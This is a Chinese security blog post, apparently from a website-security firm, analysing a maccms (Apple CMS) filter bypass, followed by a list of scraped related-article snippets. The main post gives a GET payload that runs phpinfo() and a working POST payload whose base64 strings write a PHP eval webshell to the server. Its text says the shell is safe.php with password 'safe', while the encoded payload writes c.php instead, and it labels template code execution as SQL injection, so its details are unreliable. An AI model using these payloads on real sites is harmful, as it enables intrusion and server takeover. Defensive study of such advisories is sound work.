苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下.

maccms漏洞分析与修复

苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的,也是比较稳定的,但是在安全方面出现的问题是比较多的,这次发现的是sql注入漏洞,在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示:

代码里的empty($wd函数,在进行判断如果是,或者不是的逻辑过程当中,会将前段用户访问带来的参数,进行安全过滤,我们跟进代码来追寻到苹果CMS的配置文件,在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里.

我们仔细又发现,maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发,并公开在网络上的,已经很久没有更新维护了并且还存在sql注入代码绕过的情况,参数值之间进行实体转换的时候,360的sql拦截规则没有对空白符以及反斜杠进行拦截,导致可以绕过插入恶意参数,直接请求到苹果cms后端数据库中去,获取苹果CMS的管理员账号密码。

我们来看下如何利用苹果CMS的漏洞,从上面漏洞发生的细节里可以看出,是因为拦截sql注入语句的过程中存在可以被绕过的漏洞。我们来使用%0b,以及空格对代码进行注入,sql语句在拼接中,可以插入反斜杠进行单引号的报错,从而绕过苹果CMS的安全拦截。语句如下:

GET请求:

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的具体信息

POST请求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

可以直接生成带有一句话木马后门的代码,文件名为safe.php,一句话木马链接密码是safe.

如何修复苹果cms网站漏洞呢?

对网站漏洞的修复我们要知道漏洞产生的原因,以及为何会绕过苹果CMS的安全过滤,maccms使用的addslash安全函数,sql中没有加单引号的安全防护,in字句也很容易忘记加引号,再一个后期处理安全过滤的时候可以插入单引号,stripslash导致可以加入单引号,编解码导致绕过addslash,使用urldecode编码进行注入绕过,根据上面提出的漏洞绕过,我们SINE安全提出漏洞修复的建议是:对URL解码进行双层的转义,对get,post,cookies的拦截规则进行安全更新,加强空格,以及百分符号的拦截,如果对程序代码不熟悉的话建议咨询专业的网站安全公司来处理解决。

网站木马修复网站漏洞修复方案相关推荐

  1. mysql 漏洞如何修复_Mysql漏洞修复方法思路及注意事项

    [系统环境] 系统环境:Red Hat Enterprise Linux Server release 5.4 (Tikanga)+  5.7.16 MySQL Community Server (G ...

  2. intel服务器修复两个漏洞,英特尔处理器漏洞怎么修复 Intelcpu漏洞修复方法

    英特尔处理器漏洞怎么修复?这一次由Intel服务器CPU产品诱发的安全事故现在规模正式扩大,不少玩家朋友们都非常担忧,下面我们就来分享一下Intelcpu漏洞修复方法一览,希望对各位有所参考和帮助. ...

  3. httpd服务器常见漏洞修复,apache漏洞修复

    1.SSL/TLS存在Bar Mitzvah Attack漏洞 由于apache服务器未安装SSL模块,所以需要在不重新编译apahe的情况下安装mod_ssl模块. 1.0 安装apxs,yum i ...

  4. 2008服务器漏洞修复,win2008r2漏洞修复的问题

    你好, >>漏洞1:SSL 3.0 POODLE攻击信息泄露漏洞 在 Internet Explorer 中禁用 SSL 3.0 并启用 TLS 1.0.TLS 1.1 和 TLS 1.2 ...

  5. httpd服务器常见漏洞修复,Apache漏洞修复记录

    一.慢http攻击漏洞 1.在Apache中配置reqtimeout_module设置header和body的最大响应时间. Apache配置 保存后重启Apache. 再进行测试可以看到,受到攻击后 ...

  6. php常见漏洞修复,phpstudy漏洞修复方法

    一.通过修改服务器环境内php.ini文件,将"expose_php = On"修改成"expose_php = Off"然后重启php即可. 二.若无需要可以 ...

  7. 网站漏洞修复公司处理网站被篡改跳转到其他网站的解决办法

    2019独角兽企业重金招聘Python工程师标准>>> 某一客户单位的网站首页被篡改,并收到网监的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网 ...

  8. CentOS bug修复指令集(阿里云漏洞修复方法)

    阿里云服务器经常会提示有漏洞,如 RHSA-2018:0423: kernel security, bug fix, and enhancement update (Moderate),如何修复呢?可 ...

  9. 网站被劫持 网站被劫持跳转到非法页面的解决办法

    某一客户单位的网站首页被篡改,并收到网jian的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网站首页篡改跳转到caipiao网站,根据中华人民共和国计算机信息系统 ...

  10. 网站漏洞修复方案防止SQL注入攻击漏洞

    SQL注入漏洞在网站漏洞里面属于高危漏洞,排列在前三,受影响范围较广,像asp..net.PHP.java.等程序语言编写的代码,都存在着sql注入漏洞,那么如何检测网站存在sql注入漏洞? SQL注 ...

最新文章

  1. Nature封面:人类还在看提词器,AI的辩论能力却出现了重大进展
  2. RedHat6.5网卡问题总结
  3. Reactor学习笔记
  4. 看门狗寄存器c语言代码_「正点原子NANO STM32F103开发板资料连载」第十一章 看门狗实验...
  5. XML Tree Editor(树形视图XML编辑器) v0.1.0.35
  6. html字体代码大全_HTML基础笔记(一)
  7. Linux 用虚拟地址(逻辑地址)计算物理地址(十进制 十六进制)
  8. python生成.exe文件
  9. python之decorator理解
  10. android应用程序列表,List列表应用程序-小知识 #103
  11. 漫画:如何给女朋友解释什么是2PC(二阶段提交)?
  12. python暴力破解WiFi
  13. 摄影曝光口诀_摄影中的“向右曝光”是什么以及为什么要这么做
  14. 自学java后都是怎么找的工作?
  15. 卷积神经网络(CNN)到底是个什么鬼东西(结构及作用)
  16. arm嵌入式web服务器 性能,arm嵌入式web服务器
  17. 英特尔Skylake处理器全面入驻Google Compute Engine
  18. docker logs命令
  19. Tushare取数-历史行情/实时行情
  20. 2021-02-17

热门文章

  1. 网络安全学习常用站点导航-持续更新中
  2. IPC Send timeout detected模拟和总结
  3. stack corruption detected (-fstack-protector)
  4. SSM框架—Thymeleaf模板引擎 Spring5整合Thymeleaf(XML配置)
  5. vt-d 基本操作流程
  6. 中粮营销致远A6应用探秘:高速审批执行,营销策略落地
  7. DBCO-PEG4-SUE DBCO-PEG4-蔗糖
  8. RDL 报表 - 横向合并单元格后单元格被撑高
  9. 随机数生成器python_python安全开发军规之四:使用安全的随机数生成器
  10. 基于BearPi套件开发的智能儿童手表系统